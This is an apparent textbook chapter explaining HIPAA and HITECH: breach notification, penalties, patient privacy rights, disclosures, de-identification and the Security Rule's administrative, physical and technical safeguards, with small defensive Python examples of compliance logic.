The Health Insurance Portability & Accountability Act (HIPAA) of 1996 was a bipartisan bill introduced by Senators Edward Kennedy and Nancy Kassebaum, and implemented as part of United States law. HIPAA addressed group health insurance, tax/financial aspects, transaction standardization, and security. Its Title II regulated the protection of personal health information, in addition to initiating standardization to achieve medical transaction uniformity. Later, in 2009, the Health Information Technology for Economic and Clinical Health (HITECH) Act fixed implementation problems with HIPAA. Important security-related sections of these U.S. laws covered by this chapter include the HIPAA Privacy Rule, the Security Rule, and HITECH:

• HIPAA Privacy Rule: protects health information whether or not it is computerized.
• HIPAA Security Rule: applies to computerized health information.
• HITECH Act: updates HIPAA to strengthen penalties, protect patients who have been harmed, require breach notification, and ensure compliance by both health care providers and contractors performing healthcare-related work for them [2].
• Genetic Information Nondiscrimination Act (2008): Protects against genetic testing discrimination, including limiting use by insurance companies in determining eligibility or pricing patient premiums, and preventing employers from using genetic testing in hiring, promotion, or firing.

19.1 Background

HIPAA and HITECH were implemented because:

1. Employers and other organizations were regularly using health information in hiring, promoting, and laying off employees. Example abuses include [3]:
• A woman was fired from her job after a positive review but an expensive illness


• 35% of Fortune 500 companies admitted checking medical records before hiring or promoting
• A Midwest banker and county health board member matched customer accounts with patient information. He called due the mortgages of anyone suffering from cancer.

2. Health organizations and their contractors were inappropriately accessing health information, for advertising and other purposes.
• A patient at Brigham and Women's Hospital in Boston learned that employees had accessed her medical record more than 200 times [3].
• The 13-year-old daughter of a hospital employee took a list of patients' names and phone numbers from the hospital when visiting her mother at work. As a joke, she contacted patients and told them they were diagnosed with HIV.

3. Health organizations and their contractors were negligent in safeguarding patient privacy, resulting in massive breaches. For example:
• In 2006, a desk clerk at a Florida clinic stole the health information of over 1000 patients. The clerk sold the data to a thief, who used the information to submit $2.8 million in fraudulent Medicare claims to the U.S. government.
• Eli Lilly and Co. accidentally revealed over 600 patient e-mail addresses when it sent a message without blind copy to every person registered to receive reminders about taking Prozac [3].
• In 2006, CVS pharmacies were caught throwing away unredacted pill bottles, medical instruction sheets, and pharmacy receipts. These contained patient names, addresses, prescription names, physician names, health insurance numbers, and credit card numbers [4].
• In 2009, Blue Cross Blue Shield in Tennessee had 57 hard disks stolen, releasing medical information and social security numbers for over one million people [5].

4. People avoid using health insurance when they fear their illness may adversely affect their career or health insurance availability.
• Diseases such as cancer, AIDS, sexually transmitted disease, substance abuse, and mental illness have not been reported by some patients [3].

Another problem with health care is Medical Identity Theft. In this form of identity theft, a person's name and parts of their medical identity (often, insurance) are stolen by persons without medical insurance to obtain medical services, prescriptions, and other medical supplies. This identity theft may be for prescriptions or operations, to sell or use addictive prescription drugs, or to fake charges to Medicare for financial reimbursement. For the victim whose ID is stolen, this can lead to inaccurate medical records, since recent treatment notes relate to the thief, not the victim [6, 11, 12]. This incorrect information can become life-threatening when a doctor misdiagnoses or treats the victim using the thief's medical history. In addition, the thief may leave unpaid medical charges, forwarded to a different


address, and leaving the victim with a degraded credit report. Alternatively, the thief may claim the victim's health as their own when submitting health information to third parties. Finally, there are few protections for consumers. Doctors' identifications are also stolen to submit fake Medicare transactions [6]. There is demand for medical health records: a medical identity on the black market may be worth $50, compared to $1 for credit card numbers in bulk [12].

An incentive for health organizations to take HIPAA seriously is a Health and Human Services (HHS) website that lists organizations that have suffered health information breaches. The website is known as "The Wall of Shame". In addition, IBM Security's Cost of a Data Breach Report indicates that the healthcare industry has reported the highest average cost per breach for every year between 2010 and 2022 [10], and in 2022 the average surpassed $10 million per breach.

19.2 Introduction and Vocabulary

Typical medical transactions are shown in Fig. 19.1. Employers enroll or disenroll employees into a health plan, and make premium payments for those employees. A health care provider submits a Health Plan Eligibility Inquiry to a patient's health plan, to determine what the patient qualifies for and whom to bill. The nurse sends a health care claim to the insurance provider for bills to be paid, and may send a referral if the patient should see a specialist, undergo surgery, or be admitted to a hospital. The referral is also sent to any specialist doctor or hospital, if appropriate.

The personal health information that is protected under the HIPAA Privacy Rule is called Protected Health Information (PHI).

Fig. 19.1  Typical medical transactions


Under the HIPAA Security Rule, PHI stored in computers in electronic form is renamed Electronic Protected Health Information (EPHI). Note that the abbreviation is what is normally used; if you want to think of the P letter as Protected, Patient, Personal, or Private, it does not really matter, since this data is all of those things!

All parts of your health information are protected. Let's consider a hypothetical case where you make multiple visits to a doctor who specializes in cancer, or to a cancer center. That information alone could change your brilliant career or even your ability to gain health insurance (depending on current health laws). Therefore, every part of your medical treatment and medical bills is protected by HIPAA. Let us consider next that you obtain medical insurance through your workplace, and you commute from a remote location (e.g., rural or long distance), or you work for a small business. Consider that your employer hears that someone from a specific zip code or with a specific area code visits a cancer center. That can uniquely identify you. Therefore, each part of your contact information and any other private information is protected. Figure 19.2 shows that all parts of your PHI are protected.

Under HIPAA, the primary organizations that needed to adhere to the regulation were Covered Entities (CE), which consisted of health care providers, health plan organizations, and health care clearinghouses. Health clearinghouses are businesses that convert nonstandard medical transactions into HIPAA-standardized transactions. Business Associates (BA) consult for health care organizations by performing claims processing, transcription, billing, and data analysis. Under HITECH, BAs are equally responsible and liable for disclosure [2]. All uses of PHI within Treatment, Payment and Operations (TPO) are protected. Health care Operations include administrative functions such as legal, quality improvement, training, certification, case management, and financial and business planning aspects. Even organizations which maintain nurses' offices need to be concerned. Thus, HIPAA/HITECH now applies widely.

Fig. 19.2  Factors composing PHI


HIPAA is clear that a breach does not include unintentional or inadvertent disclosures by workforce members or authorized persons, when this access is made in good faith, is within workers' authority, and does not result in additional disclosure or usage [7].

19.3 HITECH Breach Notification

The HITECH Breach Notification Rule, passed in 2009, specifies how a CE/BA should notify individuals and agencies if a breach of information occurs. To prevent breaches, PHI shall be shredded or destroyed and disposed of properly, and EPHI shall always be encrypted in a way that is approved by HHS. If a breach does occur, each affected patient must be notified within 60 days, although a documented, ongoing law enforcement investigation may delay the notification [7]. BAs must inform CEs of any breaches with minimal delay, at most within 60 days, and shall provide similar details about the breach.

Patient notification shall include a description of what happened; the date of the breach and its discovery; the type of information that was breached; steps the clients should take to protect themselves; and actions the CE is taking to investigate the breach, mitigate existing problems, and prevent new ones. The notification letter shall also provide contact information for any questions. If 10 or more affected people cannot be notified, e.g., due to change of address, then the CE must post the breach on their website for 90 days or publish a notice in major regional media, and include a toll-free number for patients to call. If more than 500 people were affected, the CE must also notify HHS as soon as possible and inform local media. If fewer than 500 people were affected, the CE must notify HHS within 60 days after the end of the year.

HIPAA established penalties and jail time for violators of the law. The imposed jail time was up to 1 year for "wrongful disclosure" of PHI/EPHI, up to 5 years if this wrongful disclosure was "committed under false pretenses," and up to 10 years if the breach was performed "with intent to sell, achieve personal gain, or cause malicious harm." HITECH increased the penalties to what is shown in Table 19.1. These fees are adjusted for inflation and thus change annually [8]. The jail time still applies mainly for cases of fraud and criminal intent.

Table 19.1  Penalties for HIPAA/HITECH violations (2022 fees)
• CE/BA exercised reasonable diligence but did not learn about violation: $120–30,113 per violation; maximum $30,133 per year
• Violation is due to reasonable cause: $1,205–60,226 per violation; maximum $120,452 per year
• CE/BA demonstrated willful neglect but corrected violation: $12,045–60,226 per violation; maximum $301,130 per year
• CE/BA demonstrated willful neglect and took no corrective action within 30 days: $60,226–1.8 million per violation; maximum $1.8 million per year

Breaches are seriously enforced! Concerning the CVS pharmacy breach, the FTC and Health and Human Services (HHS) each developed separate remediation

plans with CVS that included the development of a security plan, security policies, and an employee training program. The remediation plans also required independent audits and HHS monitoring. CVS paid $2.25 million in fines [4]. Blue Cross Blue Shield, which lost 57 disks of PHI, paid $1.5 million to Office of Civil Rights, incurred a 3-year remediation plan, and spent $17 million in investigation, notification, and protection expenses [5]. Parts of HITECH have been incorporated into the U.S. HIPAA Administrative Simplification [7], published by the Department of Health and Human Services (DHS), Office for Civil Rights. Penalties are documented in section §160.404 and breach notification is within Subpart D §164.400.
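The notification duties above amount to a decision procedure, so they can be captured directly in code. The following Python sketch is illustrative only; the field and function names are hypothetical, while the thresholds and deadlines come from the rule text above.

    from dataclasses import dataclass

    @dataclass
    class Breach:
        affected: int               # number of individuals whose PHI was exposed
        unreachable: int            # individuals who cannot be contacted (e.g., stale addresses)
        law_enforcement_hold: bool  # a documented, ongoing investigation may delay notice

    def notification_actions(b: Breach) -> list[str]:
        """Return HITECH notification duties for a breach (illustrative only)."""
        actions = []
        if b.law_enforcement_hold:
            actions.append("Patient notification delayed by law enforcement; document the hold")
        else:
            actions.append("Notify each affected patient within 60 days of discovery")
        if b.unreachable >= 10:
            actions.append("Post substitute notice on the website for 90 days or in major "
                           "regional media, with a toll-free number")
        if b.affected > 500:
            actions.append("Notify HHS as soon as possible and inform local media")
        else:
            actions.append("Notify HHS within 60 days after the end of the calendar year")
        return actions

    # Example: a stolen laptop exposing 1,200 patient records
    for duty in notification_actions(Breach(affected=1200, unreachable=12,
                                            law_enforcement_hold=False)):
        print("-", duty)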

19.4 HIPAA Privacy Rule

The Privacy Rule addresses patient privacy. It was originally written to apply regardless of whether an office used computers. The Privacy Rule is meant to be reasonable and not cause major expenses, such as architectural changes. Hard-copy patient information shall be maintained in locked cabinets or destroyed via paper shredders. Doctors and nurses should maintain patient privacy by shutting or locking doors and keeping their voices down. Providers should maintain a clear desk policy, so that no patient information is visible other than that of the patient being served. Computers should be protected by passwords and automatic screen savers, to ensure that no patient information is divulged when a worker walks away from a terminal. Hospital patients are entitled to privacy curtains, but not necessarily private rooms or soundproof walls. It is also acceptable for doctors to talk with nurses at nurse stations about patient care. In summary, precautions shall be taken, but they should not prevent regular patient-care business.

The Privacy Rule ensures that health care providers maintain policies and procedures regarding patient privacy. Providers must regularly review these policies and procedures, and update them when new requirements emerge. Providers shall validate that these policies and procedures are consistently implemented throughout the organization. Some of those policies shall mandate that health information is not used for non-health purposes, including marketing [2, 3]. Workers shall have need-to-know and minimum necessary access to patient information, sufficient only to do their primary job. A data classification scheme, such as is defined in the Information Security chapter, documents permissions. Each CE organization shall name one person who is accountable for Privacy Rule compliance, and each full- and part-time employee, volunteer, and contractor must be trained in privacy, sufficiently to adhere to the law.
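Minimum necessary access is typically enforced with a role-based permission map derived from the data classification scheme. The sketch below is a minimal Python illustration; the roles, record sections, and function names are hypothetical, not drawn from the regulation.

    # Hypothetical role-to-permission map implementing "minimum necessary" access.
    ROLE_PERMISSIONS = {
        "billing_clerk":  {"demographics", "billing"},
        "nurse":          {"demographics", "treatment", "medications"},
        "physician":      {"demographics", "treatment", "medications", "lab_results"},
        "marketing":      set(),   # PHI may not be used for non-health purposes
    }

    def may_access(role: str, record_section: str) -> bool:
        """Allow access only to the sections a role needs for its primary job."""
        return record_section in ROLE_PERMISSIONS.get(role, set())

    assert may_access("nurse", "medications")
    assert not may_access("billing_clerk", "lab_results")
    assert not may_access("marketing", "demographics")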


19.4.1 Patient Privacy and Rights

Subpart E of the HIPAA Administrative Simplification Regulation Text outlines privacy, disclosure and de-identification procedures [7]. Specific rights attributable to patients include:

• Notification of breach of their PHI (Subpart D of HIPAA);
• Disclosures where a patient has the opportunity to agree or object (§164.510);
• Notice of Privacy Practices: informs patients how their information is used and protected (§164.520);
• Rights to request privacy protection for PHI: limitations apply for emergency care and healthcare operations (§164.522);
• Access of patients to their PHI: limitations apply where the PHI involves psychotherapy notes, legal or research purposes, is related to the Clinical Laboratory Improvement Amendments, or provides documentation about other persons (§164.524);
• Amendment of PHI: patients may be required to submit a written request, with reasoning, to change PHI; the CE shall respond within 60 days, extendable to 90 days (§164.526);
• Accounting of disclosures: patients may request a list of disclosures for the previous six years, although some disclosures need not be provided, such as those related to healthcare operations, legal purposes, and limited data sets (§164.528).

Patients should know how their provider handles privacy, via a Notice of Privacy Practices (NPP). Health plans and health providers must provide their NPP to clients upon enrollment or at first service delivery, and both must request signed acknowledgment of receipt of the NPP. The NPP must be displayed prominently in the office and on any website, and copies should be available upon request. If privacy practices change, a revised NPP must be issued to clients within 60 days.

When patients request access to their PHI, the CE must provide the information within 30 days, or provide a written reason, within that 30-day timeframe, explaining why it will take longer; the CE may then delay an additional 30 days. HHS takes this patient right very seriously, as the quote that begins the chapter indicates. (Note that proposed regulation would reduce these time frames to 15 days [8].) While CEs may charge fees, the fees must be reasonable and cover only the costs of processing: labor, supplies and postage, as applicable. If the CE denies the request, the patient may appeal the denial.

19.4.1.1 Disclosures

CEs and BAs must track both allowed and unintended disclosures of patient information. CEs shall obtain contracts from BAs indicating that BAs are responsible for HIPAA/HITECH compliance, will use the PHI only for the required and permitted purposes stated in the agreement, and will notify CEs of any breaches [8]. If the BA outsources any of the contracted work, similar contract agreements must be signed between the BA and its subcontractor BA.


Disclosures are covered in the HIPAA Administrative Simplification Regulation Text, Subpart E, §164.500–520. Allowed disclosures include [3, 7]:

Required Disclosure: Each patient shall be able to access their own PHI, as noted above. In some cases, a parent, guardian or personal representative, such as next of kin, may require PHI. The Office for Civil Rights, which is tasked with investigating violations of the Privacy Rule, may access PHI when investigating suspected wrongdoing.

Permitted Disclosure: PHI may be disclosed without patient authorization for public health authorities, judicial proceedings, coroners/funerals, organ donation, approved research, military-related situations, government-provided benefits, worker's compensation, domestic violence or abuse, and some law enforcement activities. The amount disclosed should be the minimum necessary: for domestic violence, for example, only treatments related to the violence are shared, not the full medical history. Before PHI is provided, identity must be verified, for example by proof of identity/badge and documentation.

Routine Disclosure: These PHI disclosures happen routinely, such as in regular treatment, payment or healthcare operations, including a referral to another health provider, as part of medical transcription, to report births, deaths, communicable diseases and other vital statistics, or to inform schools of immunizations. These disclosures should be addressed in policies, procedures and forms, to ensure that minimal information is provided in acceptable ways and that the disclosure is documented.

Authorization Required Disclosure: Under some circumstances, the CE must request permission from the patient to disclose PHI. These disclosures may include psychotherapy notes, marketing of information to the patient, sales of the patient's information to a third party, and research purposes. In a few cases (e.g., research purposes) multiple authorizations may be joined into one compound authorization. CEs/BAs must honor patient-revoked authorizations, including authorization expiration dates. Research does have special requirements, such as approval from an IRB/privacy review board and statements of privacy to protect patients. CEs shall have reasonable criteria for reviewing requests for these non-routine PHI disclosures, so that they occur through a standardized review process.

Incidental Disclosure: Some disclosures may be unavoidable in performing regular health functions. For example, a patient may overhear advice given to another patient in a hospital room or near a nurse's desk. CEs shall take reasonable care to minimize such disclosures, but need not track them.

Finally, some disclosures are not permitted, namely inadvertent disclosures and breaches. An inadvertent disclosure is PHI disclosed by mistake, without authorization. These disclosures must be tracked, and may require notification. Examples of breaches include a stolen computer or backup tape/disk, or a hacker breaking into a PHI database. Breaches always require notification, as described in a previous section.
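Since most disclosure categories must be tracked to support a later accounting of disclosures, a CE's system might tag each disclosure with its category. The Python sketch below is a hypothetical illustration; the enum values mirror the categories above, while the data structures and names are invented.

    from enum import Enum, auto
    from datetime import date

    class DisclosureType(Enum):
        REQUIRED = auto()      # patient, personal representative, OCR investigation
        PERMITTED = auto()     # public health, judicial, organ donation, etc.
        ROUTINE = auto()       # treatment, payment, healthcare operations
        AUTHORIZED = auto()    # patient signed an authorization (e.g., psychotherapy notes)
        INCIDENTAL = auto()    # unavoidable, e.g., overheard at a nurse's desk
        INADVERTENT = auto()   # mistake without authorization; must be tracked

    def must_log(kind: DisclosureType) -> bool:
        # Incidental disclosures need not be tracked; everything else is logged
        # so the CE can produce an accounting of disclosures for six years.
        return kind is not DisclosureType.INCIDENTAL

    disclosure_log: list[tuple[date, str, DisclosureType]] = []

    def record_disclosure(recipient: str, kind: DisclosureType) -> None:
        if must_log(kind):
            disclosure_log.append((date.today(), recipient, kind))

    record_disclosure("county public health authority", DisclosureType.PERMITTED)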


Fig. 19.3  Disclosure authorization form

Any person who falls outside of the list of permitted disclosures may obtain PHI if the patient agrees and signs a release form, such as that in Fig. 19.3, indicating his or her approval. This includes the patient's employer, a lawyer, another insurance company, another health care provider not involved in the patient's care, or any person outside of the health care system. If the patient agrees, the patient should receive a copy of the authorization, and the CE or BA must retain the authorization for 6 years. Note that the one case where an employer is entitled to specific drug-related PHI is a mandated drug test.

19.4.1.2 De-identification and Limited Data Sets

Patient records that are de-identified are not considered individually identifiable health information, and can be processed for research, public health and healthcare operations without being subject to breach requirements. To achieve that status, the risk of re-identification must be statistically very small. Information that must be removed includes names (individual, employer and family members), geographical information (excluding state, or zip code with permissible manipulation), dates, contact information, social security and other account numbers, vehicle and device IDs, IP addresses, and biometric or facial images, among others.

A re-identification method may use randomly generated codes and code translation to re-identify a patient from a de-identified record. The re-identification algorithm must not be guessably reversible, and the mechanism to translate codes should be carefully controlled on a minimum-necessary basis. A limited data set is a de-identified file with no guessable method of reversal. The advantage of a limited data set is less opportunity for breach. When a covered entity shares a limited data set with a business associate, the CE must contract with the BA the permissible uses of the limited data set and limit distribution of this data (Fig. 19.4).


Fig. 19.4  Example de-identified, or limited data set (with blocklist)
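De-identification of this kind can be approximated in code by stripping identifier fields and truncating quasi-identifiers. The Python sketch below is a simplified illustration, assuming a hypothetical record schema; a real implementation must cover all identifier categories above and statistically verify that the risk of re-identification is very small.

    import copy

    # A subset of the identifiers that de-identification removes, for illustration;
    # the field names are hypothetical and depend on the record schema.
    IDENTIFIER_FIELDS = {
        "name", "employer", "family_members", "street_address", "dates",
        "phone", "email", "ssn", "account_numbers", "vehicle_id",
        "device_id", "ip_address", "biometric_data", "photo",
    }

    def deidentify(record: dict) -> dict:
        """Return a copy of the record with identifier fields removed."""
        clean = copy.deepcopy(record)
        for field in IDENTIFIER_FIELDS:
            clean.pop(field, None)
        # Keep only the leading digits of the zip code, an example of
        # permissible zip code manipulation (conditions apply in practice).
        if "zip" in clean:
            clean["zip"] = str(clean["zip"])[:3] + "XX"
        return clean

    patient = {"name": "J. Doe", "zip": "53140", "diagnosis": "J45.909", "ssn": "xxx-xx-1234"}
    print(deidentify(patient))   # {'zip': '531XX', 'diagnosis': 'J45.909'}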

19.5 HIPAA Security Rule

The Security Rule applies when computers are used in a CE/BA environment. The Security Rule recognizes that confidentiality, integrity and availability are each required to protect health information [2, 3]. With computerization, PHI becomes Electronic PHI (EPHI), the Minimum Necessary requirement translates into authentication and access control, and the tracking of disclosures is implemented using unique login credentials and transaction logging. Logs of medical transactions record who accessed or modified medical records, at what time and for what reason. This logging supports nonrepudiation, making employees accountable for what they access and do to medical data.

The goal of the regulation is that security be scalable, technology independent, and comprehensive. The regulation avoids specifying detailed technologies that are likely to change with time; nonetheless, the HIPAA Security Rule is comprehensive in its security coverage. The HIPAA/HITECH Security Rule requirements are listed in Table 19.2 [7]. Each requirement is designated Required (R) or Addressable (A). Required standards specify the precise implementation that is expected; there is no leeway in implementation. Addressable standards allow documented, alternative implementations that are effective in achieving the intent of the standard. Table 19.2 provides the actual HIPAA text for the Security Rule; the table has been slightly modified for readability: EPHI is abbreviated, and full legal paragraph numbers have been removed and replaced with general paragraph names. The Security Rule is divided into three sections: administrative, physical and technical security requirements. As you shall see, virtually everything this book covers is required by HIPAA/HITECH.
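Transaction logging of the kind the rule envisions can be as simple as an append-only audit trail recording who accessed which record, when, and why. The Python sketch below, using the standard logging module, is a minimal illustration; the identifiers, file name, and field names are hypothetical, and a production system would forward entries to protected, centralized log storage.

    import logging
    from datetime import datetime, timezone

    logging.basicConfig(filename="ephi_audit.log", level=logging.INFO,
                        format="%(message)s")

    def log_ephi_access(user_id: str, patient_id: str, action: str, reason: str) -> None:
        """Record who touched which record, when, and why, supporting nonrepudiation."""
        logging.info("%s user=%s patient=%s action=%s reason=%s",
                     datetime.now(timezone.utc).isoformat(), user_id, patient_id,
                     action, reason)

    log_ephi_access(user_id="nurse-0412", patient_id="MRN-88231",
                    action="view-medications", reason="scheduled treatment")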

19.5.1 Administrative Requirements

Administrative requirements include risk management, alarm/log monitoring, periodic policy review/audit, and personnel management. Risk management ensures that security costs correspond with risk: a hospital should spend more than a doctor's office. Risk assessment should be accurate and thorough, and its findings implemented. The implementation requirement includes monitoring computer and network logs, performing vulnerability assessments, and performing audits to ensure worker adherence to procedures and control effectiveness.

Table 19.2  Security rule requirements [7]

HIPAA administrative simplification text (slightly modified for simpler reading; each requirement is marked Required or Addressable inline):

§164.308 Administrative safeguards
(1) Standard: Security management process. Implement policies and procedures to prevent, detect, contain, and correct security violations.
  (A) Risk analysis (Required). Conduct an accurate and thorough assessment of the potential risks and vulnerabilities to the confidentiality, integrity, and availability of EPHI held by the covered entity or business associate.
  (B) Risk management (Required). Implement security measures sufficient to reduce risks and vulnerabilities to a reasonable and appropriate level.
  (C) Sanction policy (Required). Apply appropriate sanctions against workforce members who fail to comply with the security policies and procedures of the covered entity or business associate.
  (D) Information system activity review (Required). Implement procedures to regularly review records of information system activity, such as audit logs, access reports, and security incident tracking reports.
(2) Standard: Assigned security responsibility. Identify the security official who is responsible for the development and implementation of the policies and procedures required by this subpart for the covered entity or business associate.
(3) Standard: Workforce security. Implement policies and procedures to ensure that all members of its workforce have appropriate access to electronic protected health information, as provided under paragraph (4) of this section, and to prevent those workforce members who do not have access under paragraph (4) of this section from obtaining access to EPHI.
  (A) Authorization and/or supervision (Addressable). Implement procedures for the authorization and/or supervision of workforce members who work with EPHI or in locations where it might be accessed.
  (B) Workforce clearance procedure (Addressable). Implement procedures to determine that the access of a workforce member to EPHI is appropriate.
  (C) Termination procedures (Addressable). Implement procedures for terminating access to EPHI when the employment of, or other arrangement with, a workforce member ends or as required by determinations made as specified in paragraph (3)(B) of this section.
(4) Standard: Information access management. Implement policies and procedures for authorizing access to EPHI that are consistent with the applicable requirements of subpart E of this part.
  (A) Isolating health care clearinghouse functions (Required). If a health care clearinghouse is part of a larger organization, the clearinghouse must implement policies and procedures that protect the EPHI of the clearinghouse from unauthorized access by the larger organization.
  (B) Access authorization (Addressable). Implement policies and procedures for granting access to EPHI, for example, through access to a workstation, transaction, program, process, or other mechanism.


  (C) Access establishment and modification (Addressable). Implement policies and procedures that, based upon the covered entity's or the business associate's access authorization policies, establish, document, review, and modify a user's right of access to a workstation, transaction, program, or process.
(5) Standard: Security awareness and training. Implement a security awareness and training program for all members of its workforce (including management).
  (A) Security reminders (Addressable). Periodic security updates.
  (B) Protection from malicious software (Addressable). Procedures for guarding against, detecting, and reporting malicious software.
  (C) Log-in monitoring (Addressable). Procedures for monitoring log-in attempts and reporting discrepancies.
  (D) Password management (Addressable). Procedures for creating, changing, and safeguarding passwords.
(6) Standard: Security incident procedures. Implement policies and procedures to address security incidents.
  Response and reporting (Required). Identify and respond to suspected or known security incidents; mitigate, to the extent practicable, harmful effects of security incidents that are known to the covered entity or business associate; and document security incidents and their outcomes.
(7) Standard: Contingency plan. Establish (and implement as needed) policies and procedures for responding to an emergency or other occurrence (for example, fire, vandalism, system failure, and natural disaster) that damages systems that contain EPHI.
  (A) Data backup plan (Required). Establish and implement procedures to create and maintain retrievable exact copies of electronic protected health information.
  (B) Disaster recovery plan (Required). Establish (and implement as needed) procedures to restore any loss of data.
  (C) Emergency mode operation plan (Required). Establish (and implement as needed) procedures to enable continuation of critical business processes for protection of the security of EPHI while operating in emergency mode.
  (D) Testing and revision procedures (Addressable). Implement procedures for periodic testing and revision of contingency plans.
  (E) Applications and data criticality analysis (Addressable). Assess the relative criticality of specific applications and data in support of other contingency plan components.
(8) Standard: Evaluation. Perform a periodic technical and nontechnical evaluation, based initially upon the standards implemented under this rule and, subsequently, in response to environmental or operational changes affecting the security of EPHI, that establishes the extent to which a covered entity's or business associate's security policies and procedures meet the requirements of this subpart.


(9)(A) Business associate contracts and other arrangements. A covered entity may permit a business associate to create, receive, maintain, or transmit EPHI on the covered entity's behalf only if the covered entity obtains satisfactory assurances, in accordance with Organizational Requirements (§ 164.314), that the business associate will appropriately safeguard the information. A covered entity is not required to obtain such satisfactory assurances from a business associate that is a subcontractor.
  (B) A business associate may permit a business associate that is a subcontractor to create, receive, maintain, or transmit EPHI on its behalf only if the business associate obtains satisfactory assurances, in accordance with § 164.314, that the subcontractor will appropriately safeguard the information.
  (C) Written contract or other arrangement (Required). Document the satisfactory assurances required by paragraph (9)(A) or (9)(B) of this section through a written contract or other arrangement with the business associate that meets the applicable requirements of § 164.314. [amended 1/25/13]

§164.310 Physical safeguards
(a) Standard: Facility access controls. Implement policies and procedures to limit physical access to its electronic information systems and the facility or facilities in which they are housed, while ensuring that properly authorized access is allowed.
  (i) Contingency operations (Addressable). Establish (and implement as needed) procedures that allow facility access in support of restoration of lost data under the disaster recovery plan and emergency mode operations plan in the event of an emergency.
  (ii) Facility security plan (Addressable). Implement policies and procedures to safeguard the facility and the equipment therein from unauthorized physical access, tampering, and theft.
  (iii) Access control and validation procedures (Addressable). Implement procedures to control and validate a person's access to facilities based on their role or function, including visitor control, and control of access to software programs for testing and revision.
  (iv) Maintenance records (Addressable). Implement policies and procedures to document repairs and modifications to the physical components of a facility which are related to security (for example, hardware, walls, doors, and locks).
(b) Standard: Workstation use. Implement policies and procedures that specify the proper functions to be performed, the manner in which those functions are to be performed, and the physical attributes of the surroundings of a specific workstation or class of workstation that can access EPHI.
(c) Standard: Workstation security. Implement physical safeguards for all workstations that access electronic protected health information, to restrict access to authorized users.


(d) Standard: Device and media controls. Implement policies and procedures that govern the receipt and removal of hardware and electronic media that contain EPHI into and out of a facility, and the movement of these items within the facility.
  (i) Disposal (Required). Implement policies and procedures to address the final disposition of EPHI, and/or the hardware or electronic media on which it is stored.
  (ii) Media re-use (Required). Implement procedures for removal of EPHI from electronic media before the media are made available for re-use.
  (iii) Accountability (Addressable). Maintain a record of the movements of hardware and electronic media and any person responsible therefore.
  (iv) Data backup and storage (Addressable). Create a retrievable, exact copy of EPHI, when needed, before movement of equipment. [amended 1/25/13]

§164.312 Technical safeguards
(a) Standard: Access control. Implement technical policies and procedures for electronic information systems that maintain EPHI to allow access only to those persons or software programs that have been granted access rights as specified in Administrative Safeguards (§ 164.308(4)).
  (i) Unique user identification (Required). Assign a unique name and/or number for identifying and tracking user identity.
  (ii) Emergency access procedure (Required). Establish (and implement as needed) procedures for obtaining necessary EPHI during an emergency.
  (iii) Automatic logoff (Addressable). Implement electronic procedures that terminate an electronic session after a predetermined time of inactivity.
  (iv) Encryption and decryption (Addressable). Implement a mechanism to encrypt and decrypt EPHI.
(b) Standard: Audit controls. Implement hardware, software, and/or procedural mechanisms that record and examine activity in information systems that contain or use EPHI.
(c) Standard: Integrity. Implement policies and procedures to protect EPHI from improper alteration or destruction.
  Mechanism to authenticate EPHI (Addressable). Implement electronic mechanisms to corroborate that EPHI has not been altered or destroyed in an unauthorized manner.
(d) Standard: Person or entity authentication. Implement procedures to verify that a person or entity seeking access to EPHI is the one claimed.
(e) Standard: Transmission security. Implement technical security measures to guard against unauthorized access to EPHI that is being transmitted over an electronic communications network.


  (i) Integrity controls (Addressable). Implement security measures to ensure that electronically transmitted EPHI is not improperly modified without detection until disposed of.
  (ii) Encryption (Addressable). Implement a mechanism to encrypt EPHI whenever deemed appropriate. [68 FR 8376, Feb. 20, 2003, as amended at 78 FR 5694, Jan. 25, 2013]

§164.314 Organizational requirements
(a) Standard: Business associate contracts or other arrangements. The contract or other arrangement required by Administrative Safeguards (§ 164.308(9)(3)) must meet the requirements of paragraph (i), (ii), or (iii) of this section, as applicable.
  (i) Business associate contracts. The contract must provide that the business associate will—
    (A) Comply with the applicable requirements of this subpart;
    (B) In accordance with § 164.308(9)(2), ensure that any subcontractors that create, receive, maintain, or transmit EPHI on behalf of the business associate agree to comply with the applicable requirements of this subpart by entering into a contract or other arrangement that complies with this section; and
    (C) Report to the covered entity any security incident of which it becomes aware, including breaches of unsecured PHI as required by Notification Requirement § 164.410.
  (ii) Other arrangements. The covered entity is in compliance with paragraph (a)(1) of this section if it has another arrangement in place that meets the requirements of Uses and Disclosures § 164.504.
  (iii) Business associate contracts with subcontractors. The requirements of paragraphs (a)(i) and (a)(ii) of this section apply to the contract or other arrangement between a business associate and a subcontractor required by Administrative Safeguards (§ 164.308(9)(4)) in the same manner as such requirements apply to contracts or other arrangements between a covered entity and business associate.
(b) Standard: Requirements for group health plans. Except when the only EPHI disclosed to a plan sponsor is disclosed pursuant to Uses and Disclosures (§ 164.504 or § 164.508), a group health plan must ensure that its plan documents provide that the plan sponsor will reasonably and appropriately safeguard EPHI created, received, maintained, or transmitted to or by the plan sponsor on behalf of the group health plan.


  Implementation specifications (Required). The plan documents of the group health plan must be amended to incorporate provisions to require the plan sponsor to—
    (i) Implement administrative, physical, and technical safeguards that reasonably and appropriately protect the confidentiality, integrity, and availability of the EPHI that it creates, receives, maintains, or transmits on behalf of the group health plan;
    (ii) Ensure that the adequate separation required by Uses and Disclosures (§ 164.504) is supported by reasonable and appropriate security measures;
    (iii) Ensure that any agent to whom it provides this information agrees to implement reasonable and appropriate security measures to protect the information; and
    (iv) Report to the group health plan any security incident of which it becomes aware. [amended 1/25/13]

§164.316 Policies and procedures and documentation requirements
(a) Standard: Policies and procedures. Implement reasonable and appropriate policies and procedures to comply with the standards, implementation specifications, or other requirements of this subpart, taking into account those factors specified in Security standards: General rules (§ 164.306). A covered entity or business associate may change its policies and procedures at any time, provided that the changes are documented and are implemented in accordance with this subpart.
(b) Standard: Documentation.
  (i) Maintain the policies and procedures implemented to comply with this subpart in written (which may be electronic) form; and
  (ii) If an action, activity or assessment is required by this subpart to be documented, maintain a written (which may be electronic) record of the action, activity, or assessment.
(2) Implementation specifications:
  (i) Time limit (Required). Retain the documentation required by paragraph (b)(1) of this section for 6 years from the date of its creation or the date when it last was in effect, whichever is later.
  (ii) Availability (Required). Make documentation available to those persons responsible for implementing the procedures to which the documentation pertains.
  (iii) Updates (Required). Review documentation periodically, and update as needed, in response to environmental or operational changes affecting the security of the EPHI. [amended 1/25/13]

